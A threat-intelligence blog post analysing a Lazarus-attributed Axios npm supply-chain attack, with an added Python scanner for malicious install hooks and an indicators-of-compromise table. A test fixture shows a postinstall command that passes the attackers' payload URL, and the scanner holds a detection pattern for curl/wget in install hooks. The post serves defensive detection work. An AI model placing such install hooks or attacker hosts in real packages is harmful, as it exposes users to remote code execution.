Lazarus Group Poisons Axios: Inside the npm Supply Chain Attack

2026-03-31 Threat Book

https://threatbook.io/blog/lazarus-group-poisons-axios-inside-the-npm-supply-chain-attack

ThreatBook attributes the Axios npm supply-chain poisoning incident to Lazarus Group, citing long-term tracking, malware behavior, and infrastructure pivots. The attack used a hijacked Axios maintainer account to publish [email protected] and [email protected] with the malicious dependency [email protected], whose postinstall hook selected Linux, Windows, or macOS payloads from http://sfrclak.com:8000/6202033. ThreatBook’s macOS analysis describes /Library/Caches/com.apple.act.mond as a C++ trojan that collects host and process information, beacons with an old IE user agent, and supports process termination, shell and script execution, process injection, and directory listing. The report links the payload to WAVESHAPER-like tradecraft and lists sfrclak.com, 142.11.206.73, callnrwise.com, related IPs, payload hashes, and a Mandiant-style YARA rule as detection material.
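The install-time hook is the point a defender can check before the payload ever runs: npm executes preinstall/install/postinstall scripts automatically, so a transitive dependency whose hook reaches out to an attacker-controlled host is visible in its package.json. The script below is an added example (not ThreatBook's code or tooling) that scans a package.json for lifecycle hooks referencing the network indicators listed in the report's IoC table, and separately matches a host file listing against the macOS drop path the report names. The remote-fetch heuristic (flagging any install hook that contains a URL, curl or wget) goes beyond the report and is an assumption of this example; the package names and file listing are constructed fixtures, and the truncated hashes from the table are not used.

```python
import json
import re

# Network indicators copied from the report's IoC table (the truncated hashes are omitted).
NETWORK_IOCS = (
    "http://sfrclak.com:8000/6202033",
    "sfrclak.com",
    "callnrwise.com",
    "142.11.206.73",
    "142.11.199.73",
    "142.11.196.73",
)

# macOS drop path named in the report.
MACOS_ARTIFACT = "/Library/Caches/com.apple.act.mond"

# npm runs these scripts automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

# Heuristic (an assumption of this example, not taken from the report): an
# install-time hook that contains a URL or a download tool deserves review
# even when it matches no known indicator.
REMOTE_FETCH_RE = re.compile(r"https?://|\b(curl|wget)\b", re.IGNORECASE)


def scan_lifecycle_scripts(package_json_text):
    """Return a list of findings for install-time hooks in one package.json.

    Each finding records the package, the hook name, the indicators the hook
    command mentions (possibly none) and whether the remote-fetch heuristic
    fired. Hooks that trigger neither check produce no finding.
    """
    pkg = json.loads(package_json_text)
    label = f"{pkg.get('name', '<unnamed>')}@{pkg.get('version', '<unversioned>')}"
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = pkg.get("scripts", {}).get(hook)
        if not cmd:
            continue
        matched = [ioc for ioc in NETWORK_IOCS if ioc in cmd]
        fetches = bool(REMOTE_FETCH_RE.search(cmd))
        if matched or fetches:
            findings.append({
                "package": label,
                "hook": hook,
                "iocs": matched,
                "remote_fetch": fetches,
            })
    return findings


def find_macos_artifacts(observed_paths):
    """Return the observed file paths equal to the report's macOS drop location."""
    return [p for p in observed_paths if p == MACOS_ARTIFACT]


# Constructed fixtures: a fictitious dependency whose postinstall references the
# report's payload URL, and a clean package for comparison. Neither is the real
# malicious package, whose name is not reproduced here.
SUSPECT_PACKAGE_JSON = json.dumps({
    "name": "example-transitive-dep",
    "version": "0.0.1",
    "scripts": {"postinstall": "node scripts/setup.js http://sfrclak.com:8000/6202033"},
})

CLEAN_PACKAGE_JSON = json.dumps({
    "name": "example-clean-dep",
    "version": "2.0.0",
    "scripts": {"test": "node test.js", "postinstall": "node build.js"},
})

# Constructed file listing of the kind a host-triage tool would produce.
OBSERVED_PATHS = [
    "/Library/Caches/com.apple.act.mond",
    "/Library/Caches/com.apple.iconservices.store",
]

if __name__ == "__main__":
    for finding in scan_lifecycle_scripts(SUSPECT_PACKAGE_JSON):
        print("ALERT", finding)
    print("clean package findings:", scan_lifecycle_scripts(CLEAN_PACKAGE_JSON))
    print("macOS artifacts:", find_macos_artifacts(OBSERVED_PATHS))
```

In practice the scanner would be pointed at every package.json under node_modules after a lockfile-pinned install; a hook that matches a known indicator is an incident, while one that only trips the remote-fetch heuristic is a review item, since some legitimate packages download prebuilt binaries at install time.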

Indicators of Compromise

Type    Value                             First Seen  Last Seen
DOMAIN  sfrclak.com                       2026-03-30  2026-04-20
HASH    ed8560c1ac7ceb6983ba995124d5917…  2026-03-31  2026-04-17
HASH    f7d335205b8d7b20208fb3ef93ee6dc…  2026-03-31  2026-04-17
DOMAIN  callnrwise.com                    2026-03-31  2026-04-17
HASH    617b67a8e1210e4fc87c92d1d1da45a…  2026-03-30  2026-04-17
HASH    92ff08773995ebc8d55ec4b8e1a225d…  2026-03-30  2026-04-17
HASH    fcb81618bb15edfdedfb638b4c08a2a…  2026-03-30  2026-04-17
URL     http://sfrclak.com:8000/6202033   2026-03-30  2026-04-17
IPv4    142.11.206.73                     2026-03-30  2026-04-17
HASH    4465bdeaddc8c049a67a3d5ec105b2f…  2026-03-31  2026-04-01
HASH    506690fcbd10fbe6f2b85b49a1fffa9…  2026-03-31  2026-04-01
HASH    5b5fbc627502c5797d97b206b6dcf53…  2026-03-31  2026-04-01
HASH    46f5eea70d536f7affe40409d7aaa5f…  2026-03-31  2026-03-31
HASH    8c8f5f095d65d3f33ce89a77dfbe84a…  2026-03-31  2026-03-31
IPv4    142.11.199.73                     2026-03-31  2026-03-31
IPv4    142.11.196.73                     2026-03-31  2026-03-31
YARA    G_Backdoor_WAVESHAPER_1           2026-02-10  2026-03-31
HASH    c91725905b273e81e9cc6983a11c8d60  2026-02-10  2026-03-31
